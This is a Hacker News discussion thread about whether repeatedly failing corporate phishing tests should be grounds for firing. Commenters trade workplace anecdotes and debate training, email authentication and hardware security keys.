
Should Failing Phish Tests Be a Fireable Offense? - headalgorithm
https://krebsonsecurity.com/2019/05/should-failing-phish-tests-be-a-fireable-offense/
======
dsfyu404ed
I worked for a defense contractor that had a 3 strikes policy for security
violations. Failing the phishing emails was a strike. Other breaches of
security policy (like getting caught letting someone tailgate you in) could be
strikes too. You got fired at 3. Nobody thought this was unreasonable. Part of
your job when you work in defense or finance is giving a sufficient number of
fucks about things that people in other industries don't have to give many
fucks about, like security. If you don't care enough about security that you
click on obvious phishing emails then you're not doing your job. Don't do your
job and get fired.

They also did have a reporting system. Presumably you wouldn't get a strike if
you clicked and reported. People who reported "legitimate" phishing attempts
were rewarded. Spear phishing is a totally different game and nobody in their
right mind would fail people for clicking on a (well crafted) spear phishing
email.

~~~
mason55
I actually like the idea of having consequences for allowing tailgating,
assuming the company cares about it. Maybe not firing, at least right away, or
if you get tricked/someone sneaks in behind you, but put some teeth in the
policy and actually enforce it.

If the company just says "don't do it" there is still social pressure to be
polite and not slam the door in someone's face. But if there are consequences
that everyone knows about then no one is going to begrudge you if you tell
them they have to swipe their own way in.

Heck, put up signs that say "allowing tailgating is a serious offense" so that
visitors are aware as well.

~~~
wang_li
Are you prepared to pay your employees a significant premium for the
requirement that they engage in fisticuffs with random strangers who may try
to tailgate into the building?

Tailgating is a problem for your physical security staff, not your run of the
mill white collar employee.

~~~
Wowfunhappy
> Are you prepared to pay your employees a significant premium for the
> requirement that they engage in fisticuffs with random strangers who may try
> to tailgate into the building?

I have zero experience with this, but I imagine the policy would be "Don't
enter the building if someone is too close behind you."

If you don't feel comfortable asking for space (fine!), turn around, go back
to your car, and call building security as necessary.

Is this shortsighted?

~~~
gnicholas
Good point. My brother was radiated into his condo building in D.C. one night.
They robbed the office after he went up to his condo. He didn't feel safe
refusing then entry, and knew this was a risk of letting them in.

After the incident, he was contacted by the building management, who asked him
what happened and warned him not to do it again.

This seems like a reasonable policy since many people would not have thought
in advance what to do if a potentially threatening person tries to tailgate.

------
Trisell
_Rohyt Belani, CEO of Leesburg, Va.-based security firm Cofense (formerly
PhishMe), said anti-phishing education campaigns that employ strongly negative
consequences for employees who repeatedly fall for phishing tests usually
create tension and distrust between employees and the company’s security
team._

This is the key. If you think security teams aren’t hated enough for having to
change your password every 90 days. Just wait until their “games” are the
reason for people getting fired. This is a guaranteed way to get your users to
not only not want to help you. But actively work against you. And if enough
people scream the C ring will eventually listen. And I don’t think the
security team will win.

~~~
freehunter
On the other hand, all the security team needs to do is point to the number of
billion-dollar breaches that have happened due to phishing. If phishing tests
are a game, then so are DR tests, so are code reviews, so is the QA
department. If phishing tests are a game, then so are your yearly performance
reviews, or showing up to work on time, or meeting your deadlines.

Not destroying the company through your own negligence should be basic
standard practice. Repeatedly failing a phishing test even when given proper
security education (like PhishMe provides) is negligence that can destroy an
entire company.

I worked in security at a company where the IT security department didn't
report up the IT chain but was under HR alongside the Internal Audit
department. Enforcing policy and holding people accountable were fundamental
expectations of our managers all the way up, no different than someone
repeatedly harassing a coworker or watching porn at work.

~~~
megaremote
So, do the security guys get fired when they misconfigure a firewall or give
the wrong settings for a database?

~~~
freehunter
If they do it wrong, get corrected with proper training, do it wrong again,
receive training again, and continue to do it wrong, then yes. Anyone would.

------
leiroigh
Phish tests need to be fair to people who actually understand something about
security.

"Opening an email" is not actually an issue (spearphishers that sit on drive-
by 0-days in current browsers or email programs are not a threat model that
most orgs can possibly defend against). Opening attachements is hard to
measure and again needs context: What kind of software and sandbox was the
attachement opened with? Attackers using some ancient forever-day word
processor exploit is realistic. Attackers sitting on fully patched VM
outbreaks is unrealistic. If the used VM has unimpeded network access, then
the attacker needs no VM outbreak. If the target opens a phish link in a
current browser, but then refuses to enter valid credentials (because user is
wary), then the user can be argued to have passed the phish test.

If you make failure fireable, then you need to demonstrate that the victim was
actually successfully phished.

If failure requires remedial training, then you can afford a high false
positive rate: Clueless victims learn not to click on links, and sophisticated
"victims" get to talk with a security person about why their action was
dangerous or harmless, and in accordance or in violation of policy.

~~~
technion
This definitely needs to be considered. I open WSL and use curl on suspicious
looking email links. I've been logged as doing so before. I'd hate for that
log to actually go somewhere significant.

~~~
Kalium
It might be worth considering carefully how safe the practice of opening
essentially random email links might be. Are you opening the links with a full
suite of forensic measures in place, or are you dropping curl $URL into your
terminal on your workstation? It looks like WSL isn't exactly a sandbox. It
does seem to already be used by some malware:
[https://research.checkpoint.com/beware-bashware-new-
method-m...](https://research.checkpoint.com/beware-bashware-new-method-
malware-bypass-security-solutions/)

In a world with drive-by exploits and where opening a link leaks information,
it perhaps could be considered unsafe to open essentially random links from
emails. I've definitely worked with developers who seem to believe that curl
is magical and inures them against every possible attack.

Curiosity is a wonderful thing! It's just sometimes it can be dangerous to a
person and to the people around them. It might not be a bad thing for people
to learn a smidge of caution.

~~~
leiroigh
One of the best policies I ever witnessed: There was a second guest network
with internet and nothing else for guests/consultants and
facebook/twitter/porn (the company just paid for internet twice). Employees
had a second crappy machine connected to the isolated guest network for this
purpose.

------
maxk42
I'm a tech professional and security is a regular part of my jobs. At one
point -- while contracting for a Fortune 500 client that shall remain unnamed
-- I received an email that was quite clearly phishing. Curious as to what the
payload was and whether it was worth reporting, I fired up lynx and followed
the link in the email from the command line.

I was promptly informed that I had failed the test and I would be receiving a
formal reprimand.

Did that make the company more secure?

~~~
ryanjshaw
Can't speak to whether a reprimand is warranted or not and I think many here
will disagree, but unless your job is investigating phishing, you shouldn't do
this because you ARE ultimately putting the corporate network at risk
unnecessarily - what if it was a real link and happened to exploit a zero day
on your box? Management wouldn't accept your reasoning for following the link
I suspect.

~~~
jsty
Considering that from what I recall Lynx doesn't execute javascript, it would
have to be one esoteric zero-day

~~~
onion2k
Downloading and executing code is only one way a browser session can be
abused. At the very least you're giving away everything your browser (even
Lynx) puts in the headers of a request. That's often a heck of a lot of useful
information for an attacker. Lynx supports cookies too so it would be possible
to track a user between sessions. I don't know how that might benefit an
attacker but I'm not an attacker[1].

I think a reasonably paranoid approach like "Hackers might think of ways to
abuse this that I haven't thought of" is best. Unless your job is to take a
risk and visit a phishing site, don't take the risk. Even with Lynx.

[1] Exactly what an attacker would say!

~~~
BeetleB
>At the very least you're giving away everything your browser (even Lynx) puts
in the headers of a request.

Which you're giving away any time you browse any external web site.

>Lynx supports cookies too so it would be possible to track a user between
sessions.

You're downloading cookies for most external web sites.

If the worst you do is the same as going to espn.com, then reprimand people
for going to any external web site.

~~~
onion2k
The point is that you're giving data to a _known_ phishing site by visiting
the link in a phishing email. It's true that ESPN might also be a phishing
site but it's less likely.

~~~
BeetleB
And my point is the data you're giving is _not_ important.

------
morrbo
I see this a lot as a security guy. There has to be a healthy medium. Users
can be fired, sure, but this should be a last resort. It's not really fair to
say "you're fired" when you don't have DKIM/SPF/DMARC, you haven't tagged
external emails as such, you haven't provided here awareness training, you
have provided training but not in a gradual form (ie. From Nigerian prince
emails right the way through to sophisticated attacks), you're not providing
outbound filtering, educational resources or a reporting tool, you've not
registered similar domain names or <my company>. otherTLD, sandboxing, AV...

Users know what phishing is, even the most naive of them. You need to do your
darndest to make sure nothing gets in to your network first off. If people are
repeat offenders then you have to chat with them first off and figure out
what's going on . If they're being intentionally obtuse - clicking emails to
see what happens even if they know it is phishing - then look into firing
them, otherwise just act like you're on the same team, provide them with
education but not overwhelming amounts, and it s eems to work has been my
experience anyway

~~~
colechristensen
Your organization becomes more secure if people aren't afraid of revealing
their mistakes.

Seriously, you should give people who fail phishing tests cupcakes and
additional future phishing tests. If there is a continued failure or inability
to learn then there is a problem to be fixed perhaps with firing.

Cultures of fear breed disaster.

~~~
freehunter
>give people who fail phishing tests... additional future phishing tests

This usually happens, especially if they're using something like PhishMe. If
you fail the phishing test, you're _immediately_ told you were tricked, and
scheduled for mandatory training within a few days. After you complete the
training you're put on a re-targeting list.

What we're talking about isn't firing someone for making a mistake. It's
firing someone for gross negligence over and over again even when given proper
training and incentives. At some point it becomes clear that the employee is a
danger to the company. If they're that careless with their emails even after
getting caught and going through training, what else are they neglecting to
do? And who might be injured/killed because they don't care?

------
britch
I think it's very case by case. On first fail of a phishing test, absolutely
not. They should have phishing explained to them again, maybe in a more
personal setting (instead of educational video/talk).

It's definitely true that anyone can be spearphished or can fall for a
sophisticated enough phishing scheme, but if someone is continually failing
the most basic phishing tests (responding to random emails asking for your
password for example) I think that's grounds for firing.

It's akin to locking up after you leave. Is it a fireable offence to fail to
lock up the office when you leave? Probably not the first time. But if you
never lock the door, at some point it becomes a liability. Sure a professional
could break in even if you lock the front door, but it's not like locking up
is pointless.

------
jerf
Proportional to the degree of damage that can be done by the employee in
question... yes, absolutely. If you have the responsibility and authority to
disburse millions of dollars to a random bank account number, then you've got
a high degree of responsibility not to be spear-phished, and it would be a
disqualification if you are unable to resist it.

On the other hand, firing a front-line call center employee because they
failed the spear-phishing tests is fairly pointless and more damaging than
helpful.

Where exactly the line falls would be up to the business and like so many
things, involves too many factors to be reasonable to discuss here. With the
typical concentrations of power and authority in a business, it's only going
to be the minority of employees that would be faced with termination for this
problem, because only a minority will have the power to do significant damage
to the business in general.

I think it's not too difficult to think that the article is mostly talking
about the situations where it isn't proportional to the degree of damage that
can be done by the employee.

------
agurk
A few years ago I received one of these at work, before I even knew they were
a thing. I would have been very annoyed if they'd taken any action against me
for following the link in it.

The email itself looked like a standard spam email, but the link was really
weird, having a few tokens as part of a query string. Normally fishing emails
have simple URLs in them.

So I did the obvious thing of opening the link in a fresh, zero data, locked-
down VM just to see where it would take me.

I got the message that I was an idiot, and my company also was notified that
I'm clueless about information security.

I can only imagine how difficult it might be to explain to someone what I had
done, and why I probably shouldn't have to go on some tedious training course
let alone be fired. Luckily all I saw was an increase in the number of these
emails I received.

~~~
wmf
Often the phishing training says "do not investigate yourself" but maybe your
company missed that part.

~~~
agurk
There's was the general "don't follow links in unknown emails" but nothing
about what to do if you're sure it's a bad email but terminally curious.

As far as I could tell nothing bad could happen (even JS was off in the
browser I used to open it) when I followed the link, but is there something I
should be aware of?

~~~
yourapostasy
Worry about CSS-based exfil.

[https://www.mike-gualtieri.com/posts/stealing-data-with-
css-...](https://www.mike-gualtieri.com/posts/stealing-data-with-css-attack-
and-defense)

The security teams are correct in the training they run about these: report
the suspicious email and leave the investigation to them, don't try to DIY the
investigation. Note you aren't penalized for false positives (reporting a
legitimate email as a phishing attempt).

~~~
heavenlyblue
I don’t understand this attack: if attacker can control CSS on the page - then
they probably can also control javascript. Which means they can extract any
data from it.

~~~
britch
I think the point was even if you disable JS in your browser to be "safe,"
there's the possibility of some nasty CSS on the page as well.

Turning off JS does not make you safe.

------
busterarm
Repeat after me:

Everyone can be spearphished.

I mean it. Everyone.

~~~
swizzler
A favorite example of mine even if it's contrived:
[https://twitter.com/sc00bzt/status/730903007014076416](https://twitter.com/sc00bzt/status/730903007014076416)

~~~
52-6F-62
Oh that's funny!

------
josefresco
I have a client in the banking industry who performed these tests. Everyone
failed. I'm not sure if they ran them again but there's a point where you need
to sit someone down and explain how serious the situation is. If they _still_
don't get it, you should probably fire them or transfer them to a department
that isn't vulnerable.

~~~
Scoundreller
Did they run the tests without training first?

What’s the point?

If Security/IT is so dense that they see any value in testing before training,
we’ve already identified a problem: culture or a “our employees are too smart
for this issue”.

~~~
aianus
> Did they run the tests without training first? What’s the point?

How do you know if your training is working if you have no baseline?

~~~
Scoundreller
They said they weren’t sure if the tests were run again. I _hope_ they were
after the training for that reason.

I’m also curious about what training methods work best (including a no-
training control group).

------
mc32
Nope. Of course not. These opportunistic campaigns use inherent human
weaknesses to lure and snare suspecting and unsuspecting users.

Now, if someone is told that official policy states you must only use approved
devices and services and you violate that and that introduces additional
weaknesses, then yes. But that’s different.

I mean phishing experts in active campaigns get phished. So, regular Jane and
Joe? ‘Course not.

------
jessriedel
Honest question: why do so many workplace penalties come with only two levels
of punishment?: words ("reprimand") and getting fired. This would be like only
having speeding tickets and the death penalty in normal law. Losing part of
your bonus for the year would certainly sting enough to provide a disincentive
without having to fire anyone.

~~~
chessturk
Many people don't get a bonus. If you have no benefits, an hourly wage, and no
path for advancement, the only thing they can do is whine or fire you.

~~~
jessriedel
Sure, that's an explanation for those sorts of jobs, but they aren't usually a
target of phishing attempts.

~~~
0xffff2
I'm a reasonably well paid software engineer in Silicon Valley, but I don't
get a bonus or options of any kind. I suppose my employer to could take
vacation days from me or not give me a raise next year, but if they did either
of those things because I "failed" a phishing test (where "fail" doesn't even
involve giving up any credentials) I would probably be looking for a new job
anyway so they might as well fire me.

~~~
jessriedel
Forgone bonus was just an example. It could be any sort of penalty or loss of
perk, and my question is directed at the stead state equilibrium of the job
market, not at behavior given whatever contracts are currently signed. E.g.,
instead of offering someone $85k, offer them $84k plus a $1k bonus if they
avoid phishing attacks. Or give a bonus vacation day to each employee who
passes the test. Etc.

------
dmbaggett
Phishing is frankly an embarrassment for the mainstream security community.
The temptation is to "blame the stupid users" \-- but the truth is that even a
script kiddie can take a real email from a mainstream brand, "Save As
HTML...", change one link, and resend... and snare even sophisticated victims.
This BlackHat talk ([https://www.youtube.com/watch?v=Z20XNp-
luNA](https://www.youtube.com/watch?v=Z20XNp-luNA)) shows just how easy it is
to phish even users who think they are too good to be fooled.

At Inky ([https://inky.com](https://inky.com)) we're using a combination of
computer vision, anomaly detection, and domain-specific hacks to identify
zero-day phishing emails "from first principles" (as I like to say). And it
works! But the pushback from the security establishment is impressive. I like
to say that there are two widely-held but false beliefs about phishing: 1)
phishing is solved; 2) phishing is unsolvable.

The truth is that we can already see clearly that within 3-5 years machines
will be good enough at identifying phishing emails that attackers will move to
another vector... but you'd never know it listening to "Security Thought
Leaders."

~~~
rurp
> The truth is that we can already see clearly that within 3-5 years machines
> will be good enough at identifying phishing emails that attackers will move
> to another vector...

Claiming that a complicated problem involving a lot of humans, that is very
much not solved at the moment, can expect to be fully "solved" in 3-5 years
stretches my credulity.

I fully expect the next decade to look much like the past several decades,
with both sides of the security arms race making incremental adjustments and
improvements.

------
bediger4000
I might consider this - if my employer gave me tools to deal with looking at
email headers, etc etc etc. That means iff I have to use Outlook/Exchange, and
nobody will tell me what the external SMTP server IP address is (and other
information) this is unreasonable.

I've had two different large, corporate employers do the phishing training
thing. I've failed occasionally at both of them. You can make a phish as close
to indistinguishable from a legit email as you want.

In my experience these "phish-your-employees" programs have 2 side effects,
both possibly unwanted:

1\. Reluctance to even look in Outlook for fear of getting a drive-by. I know
these haven't shown up in a while, but Outlook is a strange beast. That is,
I'm just not going to look for, or even open, emails. 2\. Enthusiastic
reporting of false positives. After getting burned by a decent phish, I
reported a few legit emails, including one that had a salutation of "Dear Joe
User:" or something equally generic and stupid, but was a genuine email.
There's sort of a Poe's Law in the relationship between phish and real emails.
This wastes security staff's time. Or maybe you want that. They tend to be a
bit weird and annoying.

~~~
rurp
> 2\. Enthusiastic reporting of false positives

I used to work in a casino that sent out a notice to all employees urging them
to report more suspicious activity. There was no information or training given
on what specifically to look for.

After some time the initiative was deemed a great success. Although there had
been zero improvement in the rate of dangerous activity stopped or prevented,
there had been a giant increase in the amount of reports that turned out to be
false.

~~~
greedo
We just implemented the Phishhook Outlook addon. I'm sure our Security team
will love getting 9000 emails a day to sort through (3 per day per employee).

------
donio
Yes, the security team should be fired since they failed in the educational
aspects of their job.

~~~
jawns
This is a good point, and I think there are parallels to other areas of the
industry.

For instance, let's say I'm a junior developer and I'm told that merging code
that fails a suite of unit tests is a serious offense.

If I one day forget to run the test suite and merge code that breaks stuff ...
it might be my fault at an acute level.

But at an organizational level, someone should be saying, "If it's that
important to not merge code that breaks tests ... then we should change our
process so you _cannot_ merge code until all tests have passed."

And if nobody gets faulted at the organizational level, then the junior dev is
really just a scapegoat.

------
pugworthy
The fortune 50 company I work for sends out what I must consider the stupidest
phishing test emails I've seen. They are blatantly simplistic and transparent.

I have had this fantasy of trying to see if I could trick the IT people who
send them with a phishing attempt. It would involve perhaps reporting that my
virus scanner had reported something suspicious in an email to get them to
open something.

Or maybe register mimecastprotection.com, then send out a fake email to IT as
if it was a big marketing announcement from Mimecast that "We've changed our
name! We are now Mimecast Protection as part of our commitment to serving
you!"

My theory is that a really well crafted phishing email is going to be very
hard to avoid.

~~~
brootstrap
people on my team fall for it every time our corporate IT security people send
the tests. I'm like jesus guys did you look at ANY part of the email?

------
j0057
MFA as provided FIDO/U2F seems like a much more sensible approach, that
doesn't break down on even a momentary lapse in vigilance.

------
musicale
It makes no sense to blame users for doing perfectly normal things like
clicking on web links, reading email, opening attachments, reading a memory
card, connecting to a wireless network, etc. rather than blaming hardware and
software developers for designing systems where perfectly normal actions
result in criminals taking over your computer.

It also makes no sense to blame users for thinking an email message is from
their bank when there is no obvious, visible difference between messages from
their bank and messages from criminals.

~~~
techntoke
Except the URL is usually nothing like your banks.

------
siffland
I was just talking to a coworker yesterday and at his previous job part of his
security was to go out to the employee parking lot and dump thumbdrives, if
they were plugged into the corporate network they would send a message to the
security department on the terminal and user account. I actually said to him,
no one would be stupid enough to do that, he told me they did this monthly and
at least 2 to 3 people would get caught.

He said employees had training and still failed. No one got fired for it
though.

~~~
alkonaut
It’s like people don’t have (private) computers anymore. If you get caught
doing that, or watching animal porn on your company laptop or whatever, the
problem isn’t poor IT training, the problem is that you should have bought
your own computer! How are people so eager to look at the thumb drive that
they can’t wait until they get home?

~~~
Scoundreller
I could only imagine how bad things would be if most people didn’t have their
own smartphones.

I think having a “guest” wifi discourages employees from using visiting random
streaming websites on their work computers.

------
stcredzero
Is someone trying to apply AI and Deep Learning to phishing attacks? One of
the things which PG noted in "A Plan for Spam" back in the day, was that the
Bayes classifier found markers of Spam he never would have thought of.

[http://www.paulgraham.com/spam.html](http://www.paulgraham.com/spam.html)

If Phishers are concentrating on fooling human beings in the same way that
spammers were back in the day, they might be vulnerable to such techniques.

~~~
nineteen999
That is such a fascinating document. Back in late 2002 or early 2003 I did an
implementation of the algorithm in that document in C (because I didn't
understand Lisp) with the help of a more senior programmer at my company.

Once my implementation started to work I was really amazed how such a simple
algorithm could be so successful.

------
bravoetch
Firing people for this would leave the entire company in a state of fear. Have
you seen those sci-fi dystopias where a script or AI unfairly decides the fate
of people...?

------
joshuak
As the article implies, absolutely not, and obviously so. Do not make enemies
of your own staff, a hostile workplace is exploitable, not to mention
unpleasant and demotivating.

My god are people bad at security. Security people especially so. Actual
security is not bound to the mechanics of securing things. It is bound
entirely to risk. Did you just fire the best accountant your company has
because they were too focused on solving your huge tax liability to notice a
phishing attempt. Risk.

Everyone is fallible including your IT security group. If phishing attacks are
actually causing appreciable damage to your company, it's the security group
who needs replacing. Can they report quantitatively how much more value your
organization has captured with it's 90 day password replacement policy, and
does it account for all the passwords written on post-it notes laying round,
and the productivity impact of constant forgotten passwords?

The purpose of security is to mitigate the risk of loss, but so is insurance.
Don't fixate on the machinery of security, and don't fire people for poor
email filtering who's value is not to filter emails.

------
sct202
I think it depends on the level of trust that you are given in your position.

I got reamed on another forum for saying someone shouldn't be allowed in a
certain role, after they sent $1 million to a fake bank account to someone
posing as a supplier. But if your work place doesn't have controls in place to
prevent that, it's part of your job to be that control and take additional
steps to protect yourself and your employer.

------
BeetleB
My company uses similar tests - you get a random email and if you click on the
link you're required to take some training. One of the things they emphasize
is to ensure the actual URL seems legitimate, or is pointing to a company
domain if the email claims to be from within the company. Ditto for the From
field.

Recently there were reports of an active shooter on site. Everyone got email
alerts about it. Many (most?) employees ignored the alert because the From
address was an unknown external domain. Fortunately there wasn't an active
shooter (although the person who was arrested was armed).

And then the company sent out an email asking us not to ignore those types of
emails even if it appears to be a phishing attempt.

I think from now on, just for the heck of it, I'll click on the links but
modify some of the characters in the URL. Hopefully someone _else_ in my/some
company will be notified that they need training.

------
microcolonel
Depends on what you're doing, but if your employees are dangerously gullible,
of course firing them should be on the table if they (especially repeatedly)
exercise that gullibility, and it is not feasible to give them tools to
mitigate that risk (like PGP, though that's not perfect either).

My general approach is to create computing environments which make it
generally impossible to send/receive general communications, and access
sensitive information (or the web), at the same time on the same machine. The
communication channels available to an agent while accessing a customer file
are heavily sanitized, and the environment does not allow for opening links;
images are transcoded in fresh containers on a remote machine with no general
access to the database or the internet.

The real question is: do many businesses understand the risks well enough to
make that determination well?

------
istandintraffic
We definitely do not enforce tailgating enough at DoD. I find it best to stand
aside at let people pass before I swipe. The funny thing is that they have
security that ensures there is ample space between us, but still some jackhole
wants to bend the rules because they are special.

------
NoPicklez
I work at a firm that creates and sends these phishing tests for our clients.
Prior to doing this type of work we always assess the "tone at the top"
regarding the culture of the workplace, to assess the suitability of doing
these tests.

However, if there are staff that repeatedly fail these tests and receive
constant training, then that's a question for the business in how willing they
are to accept the risk.

Given that there are tools that can quite often successfully block these types
of emails before they get to the end user. Most often when we are crafting
these emails we need to ask the IT teams to unblock the domain.

In my opinion I think in most cases no, however depending on the industry and
the strike rate you might have a case for it at some point.

------
bjt2n3904
I think I'm a pretty technical guy. I'm fairly certain if my job was more
dependent on email, I'd get phished eventually. If the IT department hasn't
made a move towards using 2FA, it doesn't seem right to punish employees with
termination.

------
viraptor
I'm interested if the company which would fire a random employee for 3 strikes
would also fire a VP-level employee. If they don't, then it's just BS, not
security, given how much more access a VP level person has.

------
msla
OK, if you do that, I won't open any links in any emails from
itdepartment@example.com, where itdepartment@example.com is the group email of
my company's IT department.

I may or may not open any emails from that address _period_ , depending on how
paranoid I'm feeling.

Or... and catch me if I'm talking crazy here... or do you want to fix the
email software so I can trust that only the IT department can send me emails
from itdepartment@example.com which actually make it through the firewall and
email filtering software and internal email security policy to reach my email
account?

------
infosecdude64
It depends on the industry and their regulatory obligations as well as their
risk tolerance. Defense and Finance should have a 3 strikes rule for specific
role within their orgs that produce the greatest risk. Health care would be
next up and may or may not benefit from a 3 strike rule.

I think a better question would be is Sr Leadership supporting the security
and risk mgmt teams in developing proper training as well as implementing and
spending the money on the proper controls to help reduce the risk to the end
user of being spear phished?

------
pugworthy
One thing to understand about phishing is that it isn't necessarily from
outside.

Our (large) company recently had a sort of big (we think) leak of internal
source code from a GitHub Enterprise server - done by an internal person who
DL'ed a bunch of code and put it outside.

Basically no security system in the world would have stopped that, as long as
we think the idea of sharing source code internally is a good idea.

So yea - the guns all point out, and if anyone inside your organization ever
tries to phish you, there's a good chance you'll never see it coming.

------
crazygringo
> _Should Failing Phish Tests Be a Fireable Offense?_

In one way, it's pretty easy to answer: if firing offenders results in real
costs from successful phishing efforts decreasing more than the cost of hiring
and training people and any side effects from worse morale... then yes.

But unless you're working with state/military secrets where lives could be at
risk, or on the security teams of financial institutions where a mistake could
lose tens of millions of dollars...

...then probably not.

------
overgard
In my experience, gullibility has little to do with innate intelligence and is
rather correlated with how much trait neuroticism you have (ie distrust of
other people/the world). So in a sense if you were to fire the most gullible
employees you might be inadvertently be selecting for neuroticism, which you
may not want (unless you're in a very security oriented business where that
could be a useful trait)

------
mg794613
I know no civilised country which law would allow such a thing. Maybe for
military or something, but anything else would simply not fly as it instigated
and fake. What if they responded OK in a real situation? Also it would
completely kill your workforce morale. Do you really want to run a fear based
organisation?

~~~
Scoundreller
I find such situations quite motivating to look for other jobs. In my
industry, it usually means they’re going to implode.

But if you’re running a monopoly, you’ll continue to exist, just in a poorly
functioning state that people have to deal with anyway.

------
Amboto2205
In the real world, i.e. Evolution, if you fall for the predator’s camouflage,
you help your species thrive by removing yourself from the gene pool. If your
fellow herd-members see you being taken down, that has a tendency to raise
their awareness. If not then they follow the same evolutionary path…

------
rdiddly
As an employee education campaign, my last Bigco employer started sending out
their OWN phishing emails, and if you clicked a link in one of them, you'd be
taken to a page explaining how you got tricked and what not to do. Pretty good
way of targeting the message to those who need it most.

~~~
0xffff2
That's pretty standard. The problem is that they don't actually attempt to
phish you. These emails are only good if your security model is that you can't
click untrusted links (i.e. you want to defend against browser 0-days). If
that's the security model, why do I even have a browser on my computer? In
fact, my organization's policy says that I'm allowed to use my work computer
for personal business (like reading a HN article while I'm taking a break)...
If they have no problem with me browsing reasonable parts of the public
internet, they have no business failing me on a phishing test that never even
asks for any credentials.

------
chris_st
Can we fire the security people at our company who test us for phishing
attacks, and then send us emails (with off-company links!) to polls, etc.,
that are required... and all the "security" in these emails is words like
"THIS IS A REAL EMAIL FROM THE COMPANY!!!"?

Sigh...

~~~
detaro
Report all those emails as suspected phishing attempts?

------
Endy
How hard is it to make people understand what a business email should or
shouldn't include? If you're being asked for data by someone you don't know,
either ask a manager or someone connected to the account in question.

Are people really so gullible & trusting?

~~~
josefresco
> If you're being asked for data by someone you don't know

That's not how spear phishing or even phishing works. The email looks like it
came from a fellow employee/boss/trusted party.

~~~
Endy
What about the sending and reply-to address? If the account is actually
compromised at a system level, that is an IT issue. Again, are people so
trusting that they don't check when asked for confidential data?

~~~
kaffeemitsahne
Sending addresses can be spoofed.

~~~
sh-run
End users should never see emails that fail DKIM or SPF checks. Sender address
spoofing is a solved problem.

If a company gets owned because they failed to implement SPF or DKIM properly,
IT is at fault, not the employee.

------
kasey_junk
Didn't google effectively prove that the only way to prevent phishing was u2f?

[http://fc16.ifca.ai/preproceedings/25_Lang.pdf](http://fc16.ifca.ai/preproceedings/25_Lang.pdf)

------
lalaithion
Two factor auth prevents most phishing attacks from being ultimately
successful, and two factor probably is easier and better on morale to
successfully implement, especially with hardware security keys nowadays.

------
ARandomerDude
In my office we can get into trouble for this. However, they always send a
magic header in the email to get through the firewall. My solution: filter out
emails with the header.

~~~
Scoundreller
What if a spearphisher is watching out for the test emails on one account and
we lose the magic headers that bypass the firewall? What then???

~~~
ARandomerDude
I don't disagree. But that's not my department and I'm not high enough up the
chain for my opinion to matter.

------
scarmig
Targeted phishing always eventually works, at scale.

If successful phishing leads to significant data breaches, that's a
technical/systemic problem, not a personal one.

------
andymoe
Honestly, if these make it to users it’s a sign IT issues. Training users is
good too obviously.

------
lamontcg
At a prior job it was mostly executives who were the worst at being phished.

------
faissaloo
That's pretty draconian.

------
kpmcc
Definitely read this headline as "Can we fire our coworkers for liking the
band Phish?"

